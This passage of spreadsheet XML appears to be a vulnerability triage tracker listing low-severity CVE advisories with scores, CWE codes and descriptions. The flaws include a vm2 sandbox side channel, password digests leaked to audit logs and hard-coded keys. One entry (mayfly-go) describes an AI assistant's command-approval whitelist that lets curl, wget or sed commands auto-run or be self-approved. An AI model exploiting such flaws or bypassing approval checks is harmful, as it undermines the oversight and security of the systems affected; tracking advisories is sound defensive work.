      <c r="B388" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54649</t>
        </is>
      </c>
      <c r="D388" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E388" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F388" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G388" s="5" t="inlineStr"/>
      <c r="H388" s="5" t="inlineStr"/>
      <c r="I388" s="5" t="inlineStr"/>
      <c r="J388" s="5" t="inlineStr"/>
      <c r="K388" s="5" t="inlineStr"/>
      <c r="L388" s="5" t="inlineStr"/>
      <c r="M388" s="5" t="inlineStr"/>
      <c r="N388" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O388" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P388" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q388" s="5" t="inlineStr"/>
      <c r="R388" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-201</t>
        </is>
      </c>
      <c r="S388" s="5" t="inlineStr">
        <is>
          <t>punchin-email is a Cloudflare Email Worker that provides two-way role aliases while relaying mail to a private inbox. Prior to 1.5.0, handleInbound delivers inbound alias mail with message.forward(), which silently drops the added Reply-To header intended to route responses through the relay. When a correspondent sends mail to an alias and the operator replies, the mail client can send directly to the correspondent from the private FORWARD_TO inbox address, exposing that address. The disclosure is limited to the operator's own email address and does not expose third-party data or provide code execution or authentication bypass. This issue is fixed in version 1.5.0.</t>
        </is>
      </c>
      <c r="T388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54649</t>
        </is>
      </c>
    </row>
    <row r="389">
      <c r="A389" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B389" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92962</t>
        </is>
      </c>
      <c r="D389" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E389" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F389" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G389" s="5" t="inlineStr"/>
      <c r="H389" s="5" t="inlineStr"/>
      <c r="I389" s="5" t="inlineStr"/>
      <c r="J389" s="5" t="inlineStr"/>
      <c r="K389" s="5" t="inlineStr"/>
      <c r="L389" s="5" t="inlineStr"/>
      <c r="M389" s="5" t="inlineStr"/>
      <c r="N389" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O389" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P389" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q389" s="5" t="inlineStr"/>
      <c r="R389" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S389" s="5" t="inlineStr">
        <is>
          <t>vm2 is a sandbox for running untrusted JavaScript. In vm2 versions up to and including 3.11.3, the defaultSandboxPrepareStackTrace function in lib/setup-sandbox.js builds its output array using prototype-walking index assignment (lines[lines.length] = value) rather than a prototype-bypassing define-property primitive. Because this bridge-internal array is allocated in the sandbox realm, code inside the sandbox can install an accessor on Array.prototype for the relevant index; the accessor is then invoked whenever the sandbox reads error.stack (or otherwise triggers Error.prepareStackTrace), allowing sandbox code to observe and intercept each stack-trace line written by the bridge. The same pattern is used in the error-handling (catch) branch. The values written are formatted strings only, so the practical impact is limited to an information side channel and a violation of vm2's bridge-container defense invariant rather than a sandbox escape; the vendor rates the issue Low. The issue is fixed in vm2 3.11.4, which installs each entry as an own data property via Reflect.defineProperty.</t>
        </is>
      </c>
      <c r="T389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92962</t>
        </is>
      </c>
    </row>
    <row r="390">
      <c r="A390" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B390" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92992</t>
        </is>
      </c>
      <c r="D390" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E390" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F390" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G390" s="5" t="inlineStr"/>
      <c r="H390" s="5" t="inlineStr"/>
      <c r="I390" s="5" t="inlineStr"/>
      <c r="J390" s="5" t="inlineStr"/>
      <c r="K390" s="5" t="inlineStr"/>
      <c r="L390" s="5" t="inlineStr"/>
      <c r="M390" s="5" t="inlineStr"/>
      <c r="N390" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O390" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P390" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q390" s="5" t="inlineStr"/>
      <c r="R390" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-863</t>
        </is>
      </c>
      <c r="S390" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in Dromara mayfly-go up to 1.11.5. The affected element is an unknown function of the file server/internal/ai/api/ai.go of the component AI Assistant. The manipulation leads to missing authorization. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The identifier of the patch is 74bcb926eb4f5f94e7681144d7bf2168a0ec7cde. Applying a patch is the recommended action to fix this issue. The whitelist bypass is one-token wide. Any compound command containing curl, wget or sed auto-runs without approval; approval is granted by the same session user (self-approval). This issue got fixed with a silent patch.</t>
        </is>
      </c>
      <c r="T390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92992</t>
        </is>
      </c>
    </row>
    <row r="391">
      <c r="A391" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B391" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54577</t>
        </is>
      </c>
      <c r="D391" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E391" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F391" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G391" s="5" t="inlineStr"/>
      <c r="H391" s="5" t="inlineStr"/>
      <c r="I391" s="5" t="inlineStr"/>
      <c r="J391" s="5" t="inlineStr"/>
      <c r="K391" s="5" t="inlineStr"/>
      <c r="L391" s="5" t="inlineStr"/>
      <c r="M391" s="5" t="inlineStr"/>
      <c r="N391" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O391" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P391" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q391" s="5" t="inlineStr"/>
      <c r="R391" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-693</t>
        </is>
      </c>
      <c r="S391" s="5" t="inlineStr">
        <is>
          <t>mport is the MidnightBSD Package Manager. Prior to 2.7.8, the audit command in mport/mport.c computed option-adjusted local_argv and local_argc values but passed the original argument entry to audit_package(). When an operator or automation used an option such as -r before a package name, stale optind state and the unadjusted argument could cause mport to audit the option token instead of the requested package, producing a false-negative or useless result that could leave a vulnerable package unidentified. The corrected parsing resets optind and optreset before using the adjusted local arguments. This issue is fixed in version 2.7.8.</t>
        </is>
      </c>
      <c r="T391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54577</t>
        </is>
      </c>
    </row>
    <row r="392">
      <c r="A392" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B392" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54578</t>
        </is>
      </c>
      <c r="D392" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E392" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F392" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G392" s="5" t="inlineStr"/>
      <c r="H392" s="5" t="inlineStr"/>
      <c r="I392" s="5" t="inlineStr"/>
      <c r="J392" s="5" t="inlineStr"/>
      <c r="K392" s="5" t="inlineStr"/>
      <c r="L392" s="5" t="inlineStr"/>
      <c r="M392" s="5" t="inlineStr"/>
      <c r="N392" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O392" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P392" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q392" s="5" t="inlineStr"/>
      <c r="R392" s="5" t="inlineStr">
        <is>
          <t>CWE-354, CWE-755</t>
        </is>
      </c>
      <c r="S392" s="5" t="inlineStr">
        <is>
          <t>mport is the MidnightBSD Package Manager. Prior to 2.7.8, mport_verify_package() in libmport/verify.c could continue after MD5File() or SHA256_File() failed and compare an expected checksum with stale data in the hash buffer rather than a newly computed digest. An attacker able to influence an installed file or the conditions that make hashing fail could receive a misleading integrity result or hide a checksum failure. This issue is fixed in version 2.7.8.</t>
        </is>
      </c>
      <c r="T392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54578</t>
        </is>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B393" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82723</t>
        </is>
      </c>
      <c r="D393" s="5" t="n">
        <v>1.8</v>
      </c>
      <c r="E393" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F393" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G393" s="5" t="inlineStr"/>
      <c r="H393" s="5" t="inlineStr"/>
      <c r="I393" s="5" t="inlineStr"/>
      <c r="J393" s="5" t="inlineStr"/>
      <c r="K393" s="5" t="inlineStr"/>
      <c r="L393" s="5" t="inlineStr"/>
      <c r="M393" s="5" t="inlineStr"/>
      <c r="N393" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O393" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P393" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q393" s="5" t="inlineStr"/>
      <c r="R393" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="S393" s="5" t="inlineStr">
        <is>
          <t>Insertion of Sensitive Information into Log File vulnerability in team-alembic AshAuthentication allows disclosure of user password digests to readers of the audit store.
The audit_log add-on builds each entry's extra_data in AshAuthentication.AddOn.AuditLog.Auditor.build_extra_data/4, which takes :actor from the action callback context verbatim. Any audited action invoked with actor: set to a user record therefore deposits that record, including its hashed_password attribute, into the audit entry. The same module already collapses the audited identity to an opaque string via AshAuthentication.user_to_subject/1 and filters params against the strategy's configured allow-list, so the actor is the only stored value that reaches the audit store unfiltered. Marking the attribute sensitive?: true does not help, because that redacts inspect/1 output rather than JSON encoding or raw-term storage.
There is no attacker-controlled trigger and no network disclosure path: entries accumulate from ordinary authenticated activity, and an attacker's own requests deposit only their own digest. Exploitation requires independent read access to the audit store, such as database credentials, an audit role, a backup, or a log shipper, at which point the digests support offline password attack against every active account. Whether the material persists depends on the data layer, since raw-term stores keep it verbatim while a SQL store raises Protocol.UndefinedError and drops the entry unless the user resource derives Jason.Encoder.
This issue affects ash_authentication: from 4.12.0 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.2.</t>
        </is>
      </c>
      <c r="T393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82723</t>
        </is>
      </c>
    </row>
    <row r="394">
      <c r="A394" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B394" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82759</t>
        </is>
      </c>
      <c r="D394" s="5" t="n">
        <v>1.8</v>
      </c>
      <c r="E394" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F394" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G394" s="5" t="inlineStr"/>
      <c r="H394" s="5" t="inlineStr"/>
      <c r="I394" s="5" t="inlineStr"/>
      <c r="J394" s="5" t="inlineStr"/>
      <c r="K394" s="5" t="inlineStr"/>
      <c r="L394" s="5" t="inlineStr"/>
      <c r="M394" s="5" t="inlineStr"/>
      <c r="N394" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O394" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P394" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q394" s="5" t="inlineStr"/>
      <c r="R394" s="5" t="inlineStr">
        <is>
          <t>CWE-760</t>
        </is>
      </c>
      <c r="S394" s="5" t="inlineStr">
        <is>
          <t>Use of a One-Way Hash with a Predictable Salt vulnerability in team-alembic AshAuthentication allows readers of the audit store to recover the client IP addresses that the audit log add-on's :hash privacy mode is meant to pseudonymise.
AshAuthentication.AddOn.AuditLog.IpPrivacy.hash_ip/1 computes a single unkeyed :crypto.hash(:sha256, salt &lt;&gt; ip) and truncates the result to 16 hexadecimal characters. The salt is read from the :audit_log_ip_salt or :secret application config keys, and falls back to the constant "default-salt-change-in-production" published in the library source when neither is set, with nothing warning that the default is in use. The IPv4 space is only 2^32 values and SHA-256 is fast, so the whole hash table is precomputable and every stored value maps back to its source address. Truncating to 16 characters does not help, and even a configured salt leaves the hash cheap enough to enumerate once it leaks.
This issue affects ash_authentication: from 4.12.0 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82759</t>
        </is>
      </c>
    </row>
    <row r="395">
      <c r="A395" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B395" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50606</t>
        </is>
      </c>
      <c r="D395" s="5" t="n">
        <v>1.2</v>
      </c>
      <c r="E395" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F395" s="5" t="inlineStr">
        <is>
          <t>8fc372e3-d9c5-46e4-9410-38469745c639</t>
        </is>
      </c>
      <c r="G395" s="5" t="inlineStr"/>
      <c r="H395" s="5" t="inlineStr"/>
      <c r="I395" s="5" t="inlineStr"/>
      <c r="J395" s="5" t="inlineStr"/>
      <c r="K395" s="5" t="inlineStr"/>
      <c r="L395" s="5" t="inlineStr"/>
      <c r="M395" s="5" t="inlineStr"/>
      <c r="N395" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O395" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P395" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q395" s="5" t="inlineStr"/>
      <c r="R395" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S395" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in the Acer System Monitoring component included with NitroSense and PredatorSense. The vulnerability is caused by the use of a hard-coded AES encryption key within the software. Under certain circumstances, a local attacker may be able to use the embedded key to access protected information or perform unauthorized actions.</t>
        </is>
      </c>
      <c r="T395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50606</t>
        </is>
      </c>
    </row>
    <row r="396">
      <c r="A396" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B396" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50608</t>
        </is>
      </c>
      <c r="D396" s="5" t="n">
        <v>1.2</v>
      </c>
      <c r="E396" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F396" s="5" t="inlineStr">
        <is>
          <t>8fc372e3-d9c5-46e4-9410-38469745c639</t>
        </is>
      </c>
      <c r="G396" s="5" t="inlineStr"/>
      <c r="H396" s="5" t="inlineStr"/>
      <c r="I396" s="5" t="inlineStr"/>
      <c r="J396" s="5" t="inlineStr"/>
      <c r="K396" s="5" t="inlineStr"/>
      <c r="L396" s="5" t="inlineStr"/>
      <c r="M396" s="5" t="inlineStr"/>
      <c r="N396" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O396" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P396" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q396" s="5" t="inlineStr"/>
      <c r="R396" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S396" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in the Acer System Monitoring component included with NitroSense and PredatorSense. The WebSocket handshake process does not properly require authentication before allowing connections to the service. Under certain circumstances, unauthorized access to service functionality may be possible.</t>
        </is>
      </c>
      <c r="T396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50608</t>
        </is>
      </c>
    </row>
    <row r="397">
      <c r="A397" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B397" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55061</t>
        </is>
      </c>
      <c r="D397" s="5" t="n">
        <v>1</v>
      </c>
      <c r="E397" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F397" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G397" s="5" t="inlineStr"/>
      <c r="H397" s="5" t="inlineStr"/>
      <c r="I397" s="5" t="inlineStr"/>
      <c r="J397" s="5" t="inlineStr"/>
      <c r="K397" s="5" t="inlineStr"/>
      <c r="L397" s="5" t="inlineStr"/>
      <c r="M397" s="5" t="inlineStr"/>
      <c r="N397" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O397" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P397" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q397" s="5" t="inlineStr"/>
      <c r="R397" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="S397" s="5" t="inlineStr">
        <is>
          <t>uniget is a universal installer and updater for (container) tools. Prior to 0.27.6, the hooks edit command in cmd/uniget/hooks.go parses UNIGET_EDITOR or EDITOR with strings.Split(editor, " ") and passes every space-delimited suffix as an argument to the selected editor executable. An attacker who can influence the editor environment and cause hook editing can supply unexpected editor arguments, potentially causing unintended actions with the privileges of the uniget process account. Go os/exec does not evaluate shell operators in these arguments, so the advisory's wrapper demonstration establishes argument delivery but does not establish shell command interpretation. This issue is fixed in version 0.27.6.</t>
        </is>
      </c>
      <c r="T397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55061</t>
        </is>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B398" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C398" s="5" t="inlineStr">
        <is>
          <t>CVE-2021-3030</t>
        </is>
      </c>
      <c r="D398" s="5" t="inlineStr"/>
      <c r="E398" s="5" t="inlineStr"/>
      <c r="F398" s="5" t="inlineStr"/>
      <c r="G398" s="5" t="inlineStr"/>
      <c r="H398" s="5" t="inlineStr"/>
      <c r="I398" s="5" t="inlineStr"/>
      <c r="J398" s="5" t="inlineStr"/>
      <c r="K398" s="5" t="inlineStr"/>
      <c r="L398" s="5" t="inlineStr"/>
      <c r="M398" s="5" t="inlineStr"/>
      <c r="N398" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O398" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P398" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q398" s="5" t="inlineStr"/>
      <c r="R398" s="5" t="inlineStr"/>
      <c r="S398" s="5" t="inlineStr">
        <is>
          <t>Cute Editor for ASP.NET 6.4 is vulnerable to reflected cross-site scripting caused by improper validation of the Theme GET parameter in colorpicker_more.aspx. A remote, unauthenticated attacker can craft a URL that, once opened by a victim in a browser session authenticated to a site running the vulnerable component, executes arbitrary JavaScript in the security context of that site.</t>
        </is>
      </c>
      <c r="T398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2021-3030</t>
        </is>
      </c>
    </row>
    <row r="399">
      <c r="A399" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B399" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C399" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-55787</t>
        </is>
      </c>
      <c r="D399" s="5" t="inlineStr"/>
      <c r="E399" s="5" t="inlineStr"/>
      <c r="F399" s="5" t="inlineStr"/>
      <c r="G399" s="5" t="inlineStr"/>
      <c r="H399" s="5" t="inlineStr"/>
      <c r="I399" s="5" t="inlineStr"/>
      <c r="J399" s="5" t="inlineStr"/>
      <c r="K399" s="5" t="inlineStr"/>
      <c r="L399" s="5" t="inlineStr"/>
      <c r="M399" s="5" t="inlineStr"/>
      <c r="N399" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O399" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P399" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q399" s="5" t="inlineStr"/>
      <c r="R399" s="5" t="inlineStr"/>
      <c r="S399" s="5" t="inlineStr">
        <is>
          <t>In MailData Email Archiving System v4.2 and earlier, a SQL injection vulnerability exists.</t>
        </is>
      </c>
      <c r="T399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-55787</t>
        </is>
      </c>
    </row>
    <row r="400">
      <c r="A400" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B400" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C400" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-62167</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2026-09-17</t>
        </is>
      </c>
      <c r="P400" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q400" s="5" t="inlineStr"/>
      <c r="R400" s="5" t="inlineStr"/>
      <c r="S400" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2026-33626. Reason: This candidate is a duplicate of CVE-2026-33626. Notes: All CVE users should reference CVE-2026-33626 instead of this candidate.</t>
        </is>
      </c>
      <c r="T400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-62167</t>
        </is>
      </c>
    </row>
    <row r="401">
      <c r="A401" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B401" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10594</t>
        </is>
      </c>
      <c r="D401" s="5" t="inlineStr"/>
      <c r="E401" s="5" t="inlineStr"/>
      <c r="F401" s="5" t="inlineStr"/>
      <c r="G401" s="5" t="inlineStr"/>
      <c r="H401" s="5" t="inlineStr"/>
      <c r="I401" s="5" t="inlineStr"/>
      <c r="J401" s="5" t="inlineStr"/>
      <c r="K401" s="5" t="inlineStr"/>
      <c r="L401" s="5" t="inlineStr"/>
      <c r="M401" s="5" t="inlineStr"/>
      <c r="N401" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O401" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P401" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q401" s="5" t="inlineStr"/>
      <c r="R401" s="5" t="inlineStr"/>
      <c r="S401" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10594</t>
        </is>
      </c>
    </row>
    <row r="402">
      <c r="A402" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B402" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11314</t>
        </is>
      </c>
      <c r="D402" s="5" t="inlineStr"/>
      <c r="E402" s="5" t="inlineStr"/>
      <c r="F402" s="5" t="inlineStr"/>
      <c r="G402" s="5" t="inlineStr"/>
      <c r="H402" s="5" t="inlineStr"/>
      <c r="I402" s="5" t="inlineStr"/>
      <c r="J402" s="5" t="inlineStr"/>
      <c r="K402" s="5" t="inlineStr"/>
      <c r="L402" s="5" t="inlineStr"/>
      <c r="M402" s="5" t="inlineStr"/>
      <c r="N402" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O402" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P402" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q402" s="5" t="inlineStr"/>
      <c r="R402" s="5" t="inlineStr"/>
      <c r="S402" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11314</t>
        </is>
      </c>
    </row>
    <row r="403">
      <c r="A403" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B403" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11432</t>
        </is>
      </c>
      <c r="D403" s="5" t="inlineStr"/>
      <c r="E403" s="5" t="inlineStr"/>
      <c r="F403" s="5" t="inlineStr"/>
      <c r="G403" s="5" t="inlineStr"/>
      <c r="H403" s="5" t="inlineStr"/>
      <c r="I403" s="5" t="inlineStr"/>
      <c r="J403" s="5" t="inlineStr"/>
      <c r="K403" s="5" t="inlineStr"/>
      <c r="L403" s="5" t="inlineStr"/>
      <c r="M403" s="5" t="inlineStr"/>
      <c r="N403" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O403" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P403" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q403" s="5" t="inlineStr"/>
      <c r="R403" s="5" t="inlineStr"/>
      <c r="S403" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11432</t>
        </is>
      </c>
    </row>
    <row r="404">
      <c r="A404" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B404" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11874</t>
        </is>
      </c>
